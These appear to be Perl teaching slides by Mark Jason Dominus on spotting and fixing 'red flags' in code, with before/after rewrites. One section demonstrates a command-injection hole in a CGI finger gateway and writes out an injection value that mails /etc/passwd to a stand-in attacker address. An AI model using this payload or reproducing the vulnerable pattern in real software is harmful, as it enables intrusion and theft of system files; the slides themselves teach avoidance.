Perl Program Repair Shop ************************ #HTML# Mark Jason Dominus ++++++++++++++++++ Plover Systems Co. ++++++++++++++++++ mjd@plover.com Chicago.pm Edition ++++++++++++++++++ v0.1 (Feb, 2006) ++++++++++++++++ * Slides at: http://perl.plover.com/flagbook/yak/Chi/ http://perl.plover.com/flagbook/yak/Chi/Chi.tgz http://perl.plover.com/flagbook/yak/Chi/Chi.zip * Sample source code at: http://perl.plover.com/flagbook/yak/Chi/sources/ ---------------------------------------------------------------- What is the class about? *********************** * Programmers write the first thing that comes into their heads * That's OK * But you should make an editing pass afterwards to clean it up * There are a couple of dozen really common mistakes most people make * They are easy to recognize and easy to repair * Even if you fix just these errors, the code becomes _drastically_ better ---------------------------------------------------------------- #RTIMG# redflag2 Red Flags ********* * A red flag is a visible sign in the code that something might be suboptimal ================================================================ * *Notice*: [R[might be]R] * *Notice*: [R[suboptimal]R], not [R[wrong]R] ================================================================ * It is _not_ a sure sign that something is wrong * NOT NOT NOT NOT ================================================================ * Instead, it's a sign that you should pause and reflect * Ask, "is this really written in the best way?" * Try to write it a different way (or two, or three) * Compare and evaluate * Decide * And then _perhaps_ replace the code with a different version ---------------------------------------------------------------- Today's examples **************** * [[Chicago.pm]] folks sent me code samples * (Late) * None of them were really suitable, for various reasons * Too short * Selectively edited * Too obscure * Written in Java (!!!) * I'll do what I can * Then we'll have a longer example form somewhere else ---------------------------------------------------------------- #LTIMG# Scream-narrow.jpg Horrors ******** * But I know you came here to see some horrors * So here's one ---------------------------------------------------------------- Introduction ************ foreach $array (values %orbital_elements_hash) { my $index = 0; my $orbital_element = $xmldocument->createElement("orbital-element"); foreach $dataitem (@$array) ... * OK, nothing strange about that * It's the contents of the inner [[foreach]] loop that are amazing ---------------------------------------------------------------- The Loaded Uzi ************** foreach $dataitem (@$array) { $keplerian_elements->appendChild($orbital_element); if($index == 0) { print "$dataitem "; } if($index == 1) { my $nasa_catalog_number = $xmldocument->createElement("nasa-catalog-number"); $orbital_element->appendChild($nasa_catalog_number); $nasa_catalog_number->appendChild($xmldocument->createTextNode($dataitem)); } elsif($index == 2) { ... ---------------------------------------------------------------- The Loaded Uzi ************** foreach $dataitem (@$array) { ...... elsif($index == 15) { my $mean_motion = $xmldocument->createElement("mean-motion"); $orbital_element->appendChild($mean_motion); $mean_motion->appendChild($xmldocument->createTextNode($dataitem)); } elsif($index == 16) { # revolution-at-epoch # first-derivative-of-mean-motion } #* $index++; } ---------------------------------------------------------------- The Loaded Uzi ************** elsif($index == 6) { # Drag } ---------------------------------------------------------------- The Loaded Uzi ************** #IMG# uzi.jpg #HTML#

Doing linear scans over an associative array is like trying to club someone to death with a loaded Uzi. #HTML#

(Larry Wall) ---------------------------------------------------------------- The Loaded Uzi ************** * I've seen this before, but never on a regular array * Usually, you see something like this: $input = _something_; for $key (%hash) { if ($key eq $input) { do_something($hash{$key}); } } * Which should of course be: $input = _something_; do_something($hash{$input}) if exists $hash{$input}; ---------------------------------------------------------------- The Loaded Uzi ************** * In extreme cases you see: for $key (keys %hash) { if ($key eq 'name') { check_name($hash{$key}); elsif ($key eq 'address') { check_address($hash{$key}); } elsif ... } * Of course, it should be: check_name($hash{name}); check_address($hash{address}); ... ---------------------------------------------------------------- The Loaded Uzi ************** * Analogously, we can replace this: for (@$items) { if ($index == 0) { _action_0 } elsif ($index == 1) { _action_1 } elsif ($index == 2) { _action_2 ... } elsif ($index == 16) { _action_16 } $index++; } * With this: _action_0 _action_1 _action_2 ... _action_16 ---------------------------------------------------------------- #IMG# redflags-crossed [R[Loop counter variables]R] **************************** * But surprisingly, this very weird example actually demonstrates a red flag * And a really nice one * A variable whose only job is to track the number of iterations through a loop * This is a good example * Because it's obvious that it isn't always the wrong thing to do * For instance: for my $item (@items) { $counter++; print "$counter: $item\n"; } * But it's _usually_ the wrong thing to do ---------------------------------------------------------------- #IMG# redflags-crossed [R[C-style for loop]R] ********************** * Most frequently, you see these in the code of ex-C-programmers: Subject: Re: How to compare two files and get the differences ? Message-Id: <7o5128$cp5$1@news1.kornet.net> for ($i=0;$i<$sizelines;$i++) { ($f1, $categorybackup, $f2, $f3, $f4, $f5, $f6, $f7) = split ('\|', $lines[$i]); ... } * Better: for $line (@lines) { my ($categorybackup) = (split /\|/, $line)[1]; ... } ---------------------------------------------------------------- Declarations ************ * Speaking of ex-C-programmers, here's another example you folks sent: sub pre_process_file { my $dbh = shift; my $file = shift; my $provider_id = shift; my $prv = shift; my $sql; my $sth; my $cmd; my %mail; my $provider_name; my $provider; my $internal_file; my $file_type; my $raw_layout; my $incoming_layout; my $valid_layout; my $zip; my @zip_members; my $member; my $data_file; my $data_out_path; my $zip_file; # input zip filename path information my $bad_file; # bad records returned from sort my $dup_file; # contains any duplicate records from exclude my $unq_file; # contains unique records from exclude my $inv_file; # contains records with invalid phone numbers my $good_file; # contains records that are ready to be loaded my $in_file; # basename of the input file my $num_in = 0; my $num_bad = 0; my $num_dupe = 0; my $num_good = 0; my $file_info_id; my @flds = qw(provider_name provider internal_file file_type raw_layout incoming_layout valid_layout); ($provider_name, $provider, $internal_file, $file_type, $raw_layout, $incoming_layout, $valid_layout) = @{$prv->{$provider_id}}{@flds}; # If file is zipped, then unzip it if ($file =~ /\.zip$/i) * Wow! * That's *42* lines of declarations ---------------------------------------------------------------- Declarations ************ * Even in C, we could have done this better * In C, you can declare variables at the head of _any_ block: /* C */ if (buf = malloc(bufsize)) { char *p = buf; ... } * In Perl, you can declare variables _anywhere_ ---------------------------------------------------------------- Declarations ************ * [G[Declare variables near where they are used]G] * This tends to keep the scope small * Easier on the maintenance programmer * So for example, instead of: my $inv_file; ... 83 lines omitted $inv_file = $data_out_path . ".inv"; * Just use: [C[my]C] $inv_file = $data_out_path . ".inv"; * This also eliminates a line of useless clutter ---------------------------------------------------------------- * That clutter is often quite easy to eliminate * This program has: my $provider_name; my $provider; my $internal_file; my $file_type; my $raw_layout; my $incoming_layout; my $valid_layout; # ... 24 lines omitted ($provider_name, $provider, $internal_file, $file_type, $raw_layout, $incoming_layout, $valid_layout) = @{$prv->{$provider_id}}{@flds}; * Why not trim this? [C[my]C] ($provider_name, $provider, $internal_file, $file_type, $raw_layout, $incoming_layout, $valid_layout) = @{$prv->{$provider_id}}{@flds}; ---------------------------------------------------------------- Declarations ************ * More trimming is possible * For example: my $member; * This variable is not used anywhere * Maybe it was used in the past, but its code was removed * The declaration lingers on, like a cold sore #IMG# longshoreman.jpg * or the Longshoremen's unions * If the declaration is near the use, it is likely to be removed at the appropriate time ---------------------------------------------------------------- Declaration near use ******************** * Here's another part of ther same program: my @now = localtime(); my $YY = strftime( "%y", @now ); my $YYYY = strftime( "%Y", @now ); my $MM = strftime( "%m", @now ); my $MMM = uc( strftime( "%b", @now ) ); my $DD = strftime( "%d", @now ); ... sub archive_file { ... my $dir; $dir = "$archive_dir/$YYYY/$MM/$DD/$provider"; * [[$YYYY]], [[$MM]], and [[$DD]] are not used anywhere else: my @now = localtime(); my $YY = strftime( "%y", @now ); my $MMM = uc( strftime( "%b", @now ) ); ... sub archive_file { ... #* my $dir = strftime "$archive_dir/%Y/%m/%d/$provider", localtime(); ---------------------------------------------------------------- Declaration near use ******************** * What about these? my @now = localtime(); my $YY = strftime( "%y", @now ); my $MMM = uc( strftime( "%b", @now ) ); * Oh, they're not used anywhere at all * Three more variables gone ---------------------------------------------------------------- Redirections ************ * I said I thought this code had been written by an ex-C-programmer * Why not an ex-shell programmer? * Well, mainly because shell programmers never declare _anything_ * But also: system("unzip -v '$incoming_dir/$file' 2>&1 >/dev/null"); * Here the intent was to discard standard output and standard error * But it only discards stdout * [[2>&1]] means "send [[stderr]] to wherever [[stdout]] is going" * [[>/dev/null]] means "send [[stdout]] to [[/dev/null]]" * The order is important here * It should have been: system("unzip -v '$incoming_dir/$file' [C[>/dev/null 2>&1]C]"); * That's not a red flag; just a bug ---------------------------------------------------------------- Ouch **** map { @{ $prv->{$_->[0]} }{@flds} = @$_[1..$#{$_}] } @$ar; * The C programmer is drunk with power! for $rec (@$ar) { my $key = shift @$rec; my %h; @h{@flds} = @$rec; $prv->{$key} = \%h; } ---------------------------------------------------------------- Ex-C-programmers **************** * I said I thought this code had been written by an ex-C-programmer * That was exhibit A * Here's B: sub main { ... } main(); ---------------------------------------------------------------- Ex-C-programmers **************** * Here's exhibit C: * The last line in the program is: exit; * The state rests, Your Honor. ---------------------------------------------------------------- Repeated Code ************* * Here's another chunk from another program: sub filetype { my $filename = shift; return "cc" if $filename =~ /\.[ch](pp)?$/; return "perl" if $filename =~ /\.(pl|pm|pod|tt|ttml|t)$/; return "php" if $filename =~ /\.(phpt?|html?)$/; return "python" if $filename =~ /\.py$/; return "ruby" if $filename =~ /\.rb$/; return "shell" if $filename =~ /\.[ckz]?sh$/; return "sql" if $filename =~ /\.(sql|ctl)$/; ... * Perl has a really nice idiom for this sort of thing: sub filetype { my $filename = shift; #* for ($filename) { return "cc" if /\.[ch](pp)?$/; return "perl" if /\.(pl|pm|pod|tt|ttml|t)$/; return "php" if /\.(phpt?|html?)$/; return "python" if /\.py$/; return "ruby" if /\.rb$/; return "shell" if /\.[ckz]?sh$/; return "sql" if /\.(sql|ctl)$/; ---------------------------------------------------------------- Repeated code ************* * Here's another such, from yet another program: my %stationInfo = shift; my $callsign = $stationInfo{Callsign}; my $timestamp =$stationInfo{LastHeard}; my $position = $stationInfo{Position}; my $status = $stationInfo{Status}; * Better: my %stationInfo = shift; my ($callsign, $timestamp, $position, $status) = @stationInfo{qw( Callsign LastHeard Position Status)}; ---------------------------------------------------------------- Unnecessary variables ********************* my %stationInfo = shift; my ($callsign, $timestamp, $position, $status) = @stationInfo{qw( Callsign LastHeard Position Status)}; * But actually, in this case we can do better * This code is immediately followed by: print $output "Callsign: $callsign\n"; print $output "Timestamp: $timestamp\n"; print $output "Position (Latitude & Longitude), Region: $position\n"; print $output "Status: $status\n"; #HTML# * [R[Use immediately follows assignment]R] print $output "Callsign: [C[$stationInfo{Callsign}]C]\n"; print $output "Timestamp: [C[$stationInfo{LastHeard}]C]\n"; print $output "Position (Latitude & Longitude), Region: [C[$stationInfo{Position]C]\n"; print $output "Status: [C[$stationInfo{Status}]C]\n"; * Then we can lose the four extraneous variables and four lines of code ---------------------------------------------------------------- Unnecessary variables ********************* * Similarly, we have: my $userAgent = LWP::UserAgent->new; my $request = $userAgent->request($uable); * This becomes: my $request = LWP::UserAgent->new->request($uable); ---------------------------------------------------------------- Unnecessary variables ********************* * And similarly: sub FindUXml { my $queryCallsign = shift; my %aprsInfo = FindU($queryCallsign); my $xmlTree = CreateStationXml(%aprsInfo)->as_XML; return $xmlTree; } * Perhaps: sub FindUXml { my $queryCallsign = shift; return CreateStationXml(FindU($queryCallsign))->as_XML; } * We could get rid of [[$queryCallsign]] too: sub FindUXml { return CreateStationXml(FindU([C[shift]C]))->as_XML; } * What do you think? ---------------------------------------------------------------- Darn! ***** * That's all I had time to prepare for tonight * The rest concerns other people's code ---------------------------------------------------------------- Some Miscellaneous Red Flags **************************** * [[\"]] * [[print]] [[print]] [[print]] [[print]] [[print]] * Many very long strings * C-style [[for]] loop * File-Scope [[my]] Variables * Excessively decorated comments * Loop counter variables * Single scalar variable in quotes * Array Length variables * Unnecessary Shell Calls * The [[swswsw]] problem ---------------------------------------------------------------- #IMG# redflags-crossed [R[\"]R] ******** #HTML# Subject: Please Help !!! Message-Id: <357F9D31.652AA817@thnet.com> print "Content-type: text/html\n\n"; print "\n\n"; print "Order Number: $OrderNum\n"; print "\n"; print "\n"; print "\n" ; print "\n\n"; print "\n\n"; print "
\n"; ... #HTML# ### .. this cesspit ... * This continued for *63* lines * There are two red flags here ---------------------------------------------------------------- #IMG# redflags-crossed [R[\"]R] ******** #HTML# print "\n"; print "\n"; ... print "
\n"; #HTML# #HTML# * [R[\"]R] is a red flag * A substantial fraction (10%) of this string is _backslashes_ * This is why we have [[qq{}]] #HTML# print qq{\n}; print qq{\n}; ... print qq{\n\n}; ... #HTML# #HTML# * [R[Many Consecutive prints]R] * Just use a multiline string: #HTML# print qq{ Order Number: $OrderNum ... ... }; #HTML# * Notice we replaced [[\n]] with an actual newline character * Now you can see what the HTML looks like ---------------------------------------------------------------- #IMG# redflags-crossed [R[Many Very Long Strings]R] **************************** print qq{ ... }; * If this happens a lot, a template-based approach may be more suitable print fill_template("order_thank_you.tmpl", NAME => "Ms. Betty White", CITY => "Hartford", STATE => 'CT', AMOUNT => 143.12, PURCHASE => [ "Long Last Soft Shine Lipstick", ... ]); sub fill_template { my $template = shift; my %data = @_; local (*TMPL, $/); open TMPL, "< $template" or die "Couldn't open template file $template: $!; aborting"; my $text = ; no strict 'refs'; # %%var%% is replaced with $data{var} $text =~ s/%%(\w+)%%/$data{$1}/g; return $text; } * Or use one of the CPAN template modules * Typical examples: [[Text::Template]], Template Toolkit * Also about 28 (!) others * Then stick the HTML in a template file somewhere else ---------------------------------------------------------------- #IMG# redflags-crossed [R[C-style for loop]R] ********************** * Usually a bad move Subject: Re: How to compare two files and get the differences ? Message-Id: <7o5128$cp5$1@news1.kornet.net> for ($i=0;$i<$sizelines;$i++) { ($f1, $categorybackup, $f2, $f3, $f4, $f5, $f6, $f7) = split ('\|', $lines[$i]); ... } * Better: for $line (@lines) { my ($categorybackup) = (split /\|/, $line)[1]; ... } ---------------------------------------------------------------- A Lucky Find! ************* * This splendid (but typical) example has several new red flags: #HTML# Subject: Re: Use of uninitialized value at ...... warning with hash of hash Message-Id: <37A17F79.36E82AF5@ebi.ac.uk>; my($each_sub, %out_subs, %left_out, $ver, $real_sub_entry_found, %final_out_subs, %out_subs, $separate_hash_entry_opt, $long_subname, @final_separate_entry_out); #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Parsing input files of perl programs #_____________________________________________ my @lib = @$lines; #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`` # This for loop does not allow return until each sub is finished #_____________________________________________________________________ for ($j=0; $j < @lib; $j++) { #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # Reading the first delimiter line and 'Title' line altogether #_______________________________________________________________ if ($lib[$j]=~/^\#[\-_]{50,}/ ) { next; } elsif ( $lib[$j]=~/^(\#+ *title *: *([\w\-\.]+))/i ) { $long_subname=$1; $sub_name=$2; $title_found=1; if ($sub_name=~/\.pl$/) { next; } ## to avoid the very first headbox $out_subs{"$sub_name"}{'title'}="$sub_name"; ... } ... } #HTML# ---------------------------------------------------------------- File-Scope [[my]] Variables *************************** my($each_sub, %out_subs, %left_out, $ver, $real_sub_entry_found, %final_out_subs, %out_subs, $separate_hash_entry_opt, $long_subname, @final_separate_entry_out); #HTML# * What this programmer *really* wants is to use a lot of global variables * But he can't, because he has [[strict 'vars']] * Freud says that repressed subconscious urges will always surface * That's what we see here #HTML#
---------------------------------------------------------------- Superstition ************ * Suppose you heard someone say #HTML#

"Smoking in bed is bad, because it will set off the fire alarm."

* This seems to miss the point ================================================================ * You might expect them to say next #HTML#

"That's why I hang a sheet over the bed when I smoke."

================================================================ * You should avoid smoking in bed because it is _dangerous_ * Whether or not the alarm goes off! ================================================================ * [[strict]] is like a fire alarm * No action is bad _because_ it provokes a [[strict]] alarm * No action is good _because_ it does not provoke a [[strict]] alarm ---------------------------------------------------------------- Superstition ************ * "Always use [[strict]]," people say. "[[strict]] good!" * [[strict]] itself confers no benefits * The benefits come from avoidance of the bad practices forbidden by [[strict]] * (Such as using global variables, or smoking in bed) * These bad practices are bad because they have certain negative effects on the program * Other practices may have the same negative effects * They are not forbidden by [[strict]] * Nevertheless, the problems are exactly the same * Conclusion: [[strict]] compliance is not enough * You must understand _why_ [[strict]] is complaining * Otherwise you'll find other ways to achieve the same negative effects ---------------------------------------------------------------- Global Lexicals *************** * Here we pay the costs of [[strict]] without collecting the benefits my($each_sub, %out_subs, %left_out, $ver, $real_sub_entry_found, %final_out_subs, %out_subs, $separate_hash_entry_opt, $long_subname, @final_separate_entry_out); * Fix (a): Get rid of [[strict]]. (Don't put it in just because people say you should.) * Fix (b): Restructure the program to use better encapsulation and smaller scopes * For example, [[$long_subname]] is used only inside the [[elsif]] block * That is where it should be declared: } elsif ( $lib[$j]=~/^(\#+ *title *: *([\w\-\.]+))/i ) { #* my $long_subname=$1; my $sub_name=$2; $title_found=1; * [R[Exercise]R]: Which of the [R[strict]R] effects is most valuable? Which is least valuable? ---------------------------------------------------------------- Excessively Decorated Comments ****************************** * I once had a student with a green hiliter marker * He hilited _every_ sentence in his algebra textbook ================================================================ #HTML#
\n}; #HTML# ---------------------------------------------------------------- [[print]] [[print]] [[print]] [[print]] [[print]] ************************************************* #HTML# print qq{\n\n}; print qq{Order Number: $OrderNum\n}; ... print qq{
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Parsing input files of perl programs #_____________________________________________ #HTML#
my @lib = @$lines; #HTML#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`` # This for loop does not allow return until each sub is finished #_____________________________________________________________________ #HTML#
for ($j=0; $j < @lib; $j++) { #HTML#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # Reading the first delimiter line and 'Title' line altogether #_______________________________________________________________ #HTML#
* Save decoration for the _most important_ comments ---------------------------------------------------------------- Excessively Decorated Comments ****************************** #HTML# * [R[Excessively decorated comments]R] waste space on the screen * The decorations must be maintained * They don't make the comment any easier to see # Parsing input files of perl programs my @lib = @$lines; # This for loop does not allow return until each sub is finished for ($j=0; $j < @lib; $j++) { # Reading the first delimiter line and 'Title' line altogether if ($lib[$j]=~/^\#[\-_]{50,}/ ) { next; ... * Real white space is probably more useful ---------------------------------------------------------------- #IMG# redflags-crossed [R[C-style for Loop]R] ********************** my @lib = @$lines; # This for loop does not allow return until each sub is finished for ($j=0; $j < @lib; $j++) { # Reading the first delimiter line and 'Title' line altogether if ($lib[$j]=~/^\#[\-_]{50,}/ ) { next; } elsif ( $lib[$j]=~/^(\#+ *title *: *([\w\-\.]+))/i ) { $long_subname=$1; $sub_name=$2; $title_found=1; if ($sub_name=~/\.pl$/) { next; } ## to avoid the very first headbox $out_subs{"$sub_name"}{'title'}="$sub_name"; ... } ... } * Replace [[for ($j=0; $j < @lib; $j++)]] with [[for my $line (@lib)]] * Replace [[$lib[$j] ]] with [[$line]] * 95% of C-style [[for]] loops can be replaced this way #HTML# * [R[Loop Counter Variables]R] ---------------------------------------------------------------- Unnecessary Variables ********************* my @lib = @$lines; # This for loop does not allow return until each sub is finished for my $line (@lib) { #HTML# * We have already seen [R[Use immediately follows assignment]R] #HTML#
# This for loop does not allow return until each sub is finished for my $line (@$lines) { ---------------------------------------------------------------- Single Scalar Variable in Quotes ******************************** $out_subs{"$sub_name"}{'title'}="$sub_name"; * In perl, [["..."]] means "construct a string" #HTML# * [[$sub_name]] is _already_ a string * So [R["$sub_name"]R] is a waste of time * In other contexts, it leads to horrific bugs: my $arg = shift; foo("$arg"); * Here [[$arg]] _was_ a reference * Not any more! * This is precisely the bad practice that [[strict refs]] was put in to save you from $out_subs{$sub_name}{title} = $sub_name; ---------------------------------------------------------------- #IMG# redflags-crossed Array Length Variables ********************** #HTML# * Related to loop counter variables are [R[Array Length Variables]R] * These are variables whose only purpose is to track the length of an array * But the array already tracks its own length * For example: Subject: Re: Sorting is too slow for finding top N keys... - BENCH II Message-Id: $pos=0; $array[$pos++]= do { my (@alloc) = ($key, $value, int(rand(1<<16))); \@alloc } while(($key, $value) = each %$href); * [[$pos]] here is entirely structural #* push @array, do { my (@alloc) = ($key, $value, int(rand(1<<16))); \@alloc } while(($key, $value) = each %$href); * (Here flow control backwards the fix also I.) while(($key, $value) = each %$href) { push @array, [$key, $value, int(rand(1<<16))]; } # or perhaps @array = map {[$_, $href->{$_}, int(rand(1<<16))]} (keys %$href); --------------------------------------------------------------- Unnecessary Shell Calls *********************** Subject: why does this not work? Message-Id: <8l1r5c$n76$1@news-int.gatech.edu> ($current_month, $current_day, $current_year) = split(/-/, `date "+%m-%d-%Y"`); $current_year=chomp $current_year; * Even if it does work, it's bizarre and expensive * [[`date...`]] must open a pipe * fork a new process * execute the shell * which forks a new process * which executes the [[date]] command * After it's all over, we have to do a [[split]] * Shell calls can cause security problems in some contexts (example coming up) * Better: ($current_month, $current_day, $current_year) = (localtime)[4,3,5]; --------------------------------------------------------------- Unnecessary Shell Calls *********************** `date` * Other common culprits here: @files = `ls`; @files = `ls *.c`; * Use [[glob('*')]] or [[glob('*.c')]] instead $data = `cat file`; * Use { my $fh = FileHandle->new('file'); local $/; $data = <$fh>; } * (Make this into a function if you do it a lot.) $cutvar = `echo $array[0] | cut -c1-7`; * Use $cutvar = substr($array[0], 0, 7); * In this last case, what if [[$array[0] ]] contains a [[*]] character? -------------------------------- Shell Call Security Disaster **************************** o This is similar to an example distributed with the popular NCSA [[httpd]] server o (At one time the most popular web server software) o It is a web gateway for the [[finger]] service o This one is in Perl; that one was a shell script #!/usr/bin/perl use CGI ':standard'; print header, start_html('Finger Gateway'); if (param()) { # Form was submitted print "
\n";
	  $cmd = 'finger ' . param('arg'); 
	  print [C[`$cmd`]C];
	  print "
\n"; exit 0; } print start_form, textfield('arg'), submit, end_form; exit 0; ---------------------------------------------------------------- Shell Call Security Disaster **************************** o User can supply an argument to this program, say [[mjd]] o User gets back finger information for [[mjd]] o A casual security analysis says: o The only nontrivial program that it runs is [[$FINGER]], which is hard-coded o Finger information is publically available anyway, so this should be safe. o *Wrong* -------------------------------- Shell Call Security Disaster **************************** $cmd = 'finger ' . param('arg'); print `$cmd`; * [[param('arg')]] is supplied by the web user * What if they supply this peculiar username: `Mail arnoldb@treachery.com < /etc/passwd` * Then [[$cmd]] is finger `Mail arnoldb@treachery.com < /etc/passwd` * The shell runs the [[Mail]] command * Oops -------------------------------- Shell Call Security Disaster **************************** o Subtle problems occur with the shell o Hard to detect even in simple programs o Casual analysis was no good o We said ``It only runs [[finger]].'' o We were wrong: it also runs [[/bin/sh]]. o [[/bin/sh]] is very complicated! o This class isn't about CGI security, so I'll leave it at that ---------------------------------------------------------------- Unnecessary Shell Calls *********************** #RTIMG# shovel.jpg o The grossest examples include [[awk]]: @name=`route | awk '/ppp/ { print $8 }' | sort -u`; o Using [[awk]] inside backticks is like digging a ditch with a shovel... ================================================================ #HTML#
o ... after unloading the shovel from the backhoe you drove up in. #IMG# backhoe.jpg ---------------------------------------------------------------- Unnecessary Shell Calls *********************** @name=`route | awk '/ppp/ { print $8 }' | sort -u`; o You almost always want to get rid of [[awk]]: for (`route`) { next unless /ppp/; $name{(split)[7]}++; } @name = sort keys %name; o Not all shell calls are unnecessary; note [[route]] here ---------------------------------------------------------------- Unnecessary Shell Calls *********************** Subject: problem with awk in perl script Message-Id: <91qbbv$g9h$1@foo.grnet.gr> system(`awk '{print $10,$1}' statdata.dat `); o This doesn't work because of quoting problems o ([[$10]] and [[$1]] are expanded by Perl before the shell is called) o Instead: open F, "< statdata.dat" or die ...; while () { my ($status, $name) = (split)[9,0]; print "$status$name\n"; } close F; ---------------------------------------------------------------- Unnecessary Shell Calls *********************** Subject: pipe to nawk within perl? Message-ID: <30d612e5.0110121606.17c983e9@posting.google.com> $let2 = `ls -l $ld/$ssn.o* | grep '$date2grep' | nawk '{print $9}'`; * Again, this didn't work * I suggest: $let2 = grep { localtime((stat $_)[9]) =~ /Sep 11.*2001$/ } glob("$ld/$ssn.o*"); ---------------------------------------------------------------- Unnecessary Shell Calls *********************** o However, I think a lot of folks take this point much too far o Some useful uses of shell calls include: o [[`ps`]] o [[system("sort -o output input");]] o (When [[input]] is very large, [[sort]] uses an external multipass merge algorithm) o One of my favorites: [[$page = `lynx -dump $URL`]] ---------------------------------------------------------------- Unnecessary Shell Calls *********************** o People can be very dogmatic about avoiding the shell o The program that makes these slides makes many shell calls o It converts many text files to HTML o The conversion is slow o So it does the conversion only if the text file has changed: #HTML# if (! -e ".bak/$filename" || system("cmp -s $filename .bak/$filename")) { print STDERR "*"; push @SLIDES, $filename; } # later, convert each file in @SLIDES from text to HTML #HTML# ---------------------------------------------------------------- Unnecessary Shell Calls *********************** if (! -e ".bak/$filename" || system("cmp -s $filename .bak/$filename")) { print STDERR "*"; push @SLIDES, $filename; } o I had a big argument with some programmers about this o They said "Calling [[cmp]] all the time is wasteful" o "You should maintain a file with MD5 checksums for each file" o My opinion: o Writing a lot of MD5 garbage when [[cmp]] works just fine is even more wasteful o To do 180 [[cmp]]s takes under 4 seconds o The MD5 thing might be faster o But it can't be more than 4 seconds faster * [G[Sufficient unto the day is the evil thereof]G] ---------------------------------------------------------------- #RTIMG# penny Unnecessary Shell Calls *********************** o Complaining that the [[cmp]] is too slow is like complaining that a ten-cent candy bar is too expensive o Maybe the candy should cost only half as much o But it's only five cents, so who cares? o This is another reason not to bother about micro-optimizations o I could probably have sped up the [[cmp]] thing by 50% if I worked hard o That would have saved me 2 seconds per run #RTIMG# 5pound.jpg o I have better things to do o [G[Don't be penny wise and pound foolish]G] ---------------------------------------------------------------- Unnecessary Shell Calls *********************** o One last example: Subject: get idle times and format it Date: Fri, 14 Dec 2001 03:55:10 +0100 $line = `top b -n 0 | awk '/idle/ {gsub ("%", "") ; print $3,$5,$7,$9}'`; @data = split(/ /, $line); $user = $data[1]; $system = $data[2]; $nice = $data[3]; $idle = $data[4] * Same problem ($line) = grep /idle/, `top b -n 0`; ($user, $system, $nice, $idle) = ($line =~ m/\d+\.\d+/g); * Note parentheses in [[($line)]] * We also reduced the Perl code substantially ---------------------------------------------------------------- Capturing the same pattern repeatedly ************************************* * Someone answering the question of the previous slide suggested: #HTML# my ( $user, $system, $nice, $idle ) = `top -b -n 0` =~ /^CPU states:\s+([0-9.]+)% user,\s+([0-9.]+)% system,\s+([0-9.]+)% nice,\s+([0 -9.]+)% idle/m; #HTML# * This is how Perl gets a reputation for being unreadable #HTML# * [R[Capturing the Same Pattern Repeatedly]R] * Here we capture [[([0-9.]+)]] four times * Often, this can be replaced with [[m//g]] or with [[split]] * As on the previous slide: ($user, $system, $nice, $idle) = ($line =~ m/[0-9.]+/g); #HTML#
---------------------------------------------------------------- #RTIMG# Randal.jpg #HTML#
Randal's Rule ************* o Randal Schwartz (author of _Learning Perl_) says: #HTML#

Use capturing when you know what you want to keep. #HTML#
Use [[split]] when you know what you want to throw away. #HTML#

---------------------------------------------------------------- Capturing the same pattern repeatedly ************************************* * Here's an extremely common special case of this problem: Subject: Re: string tokenization Message-Id: <20010627.084604.1001243552.6624@dhthomaslnx.mcafee.com> > I am working on an autometic emailing program...intended to be > written in perl I have a file of rows of email addresses and > names separated by a space and each entry by a linefeed > > emailadd FirstName LastName > emailadd2 FN2 LN2 ... if ($line =~ /(\w+)\s(\w+)\s(\w+)/) { my $email = $1; my $first = $2; my $last = $3; ... * This is [R[The swswsw Problem]R] * When you see a lot of [[\s]] alternating with [[\w+]] or [[\d*]] or [[.+]] or [[\S*]], consider using [[split]] instead: my ($email, $first, $last) = split /\s/, $line; next unless defined $last; ---------------------------------------------------------------- [[swswsw]] Problem ****************** #HTML# Subject: alternatives to ps command Message-Id: <7fe42fcd.0109240201.7a6f98c2@posting.google.com> my $ps = `ps -fu$user`; # convert our scalar $ps into an array, break on \n my @aps = split /\n/, $ps; # loop each real processes foreach my $iaps (@aps) { # these are the only elements we require my ($stime, $time, $cmd); # loop each possible process type foreach my $p (@processes) { # match the elements we require if ($iaps =~ m/^\s+\w+\s+\d+\s+\d+\s+\d+\s+([\d:]+)\s.+\s([\d:]+)\s(.+) $/) { # save the values we have matched from above regex $cmd = $3; $stime = $1; $time = $2; ... #HTML# * I suggest: for my $iaps (`ps -fu$user | tail +1`) { my ($user, $pid, $ppid, $cpu, $stime, $tty, $time, $cmd) = split /\s+/, $iaps, 8; foreach my $p (@processes) { ... * Note the [G[8]G] in the [[split]] to prevent [[$cmd]] from being split ---------------------------------------------------------------- [[swswsw]] Problem ****************** #HTML# Subject: pattern matching Message-Id: <98rf06$dao$1@newsg2.svr.pol.co.uk> ... elsif ((($_ =~ m/^P\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*( \d*|-\d*)/) or ($_ =~ m/^\s\s(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\d*|-\d* );/) or ($_ =~ m/^\s\s(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)\s*(\S*)/) or ($_ =~ m/^\s\s(\S*)\s*(\S*)\s*(\S*)\s*(\S*);/) or ($_ =~ m/^\s\s(\S*)\s*(\S*;)/)) and (($flagds2 ==1) and ($tcell_type_flag eq Leaf))) #HTML# * I'm not sure just what this code was supposed to be doing * (I don't think the original code was working correctly) * The data looked like this: P 1234 4567 23 244 445 1236 1234 7890 1234 555 6 666 -450 -900 670 -30; P 1234 456 -700 -800 -76000 -600 -900 -785 1234 455; P 1234 4567 23 244 445 1236 1234 7890 1234 555 6 666 -450 -900 670 -30 45 44 3 -20; * Something like this was surely possible: s/;\s*$//; my @numbers = split; if ($numbers[0] eq 'P') { $P_line = 1; shift @numbers } # Now do something with @numbers... ---------------------------------------------------------------- [[swswsw]] Problem ****************** Subject: Match Parsing Glitch Message-Id: <3B046663.DB985D9C@xx.com> $line =~ 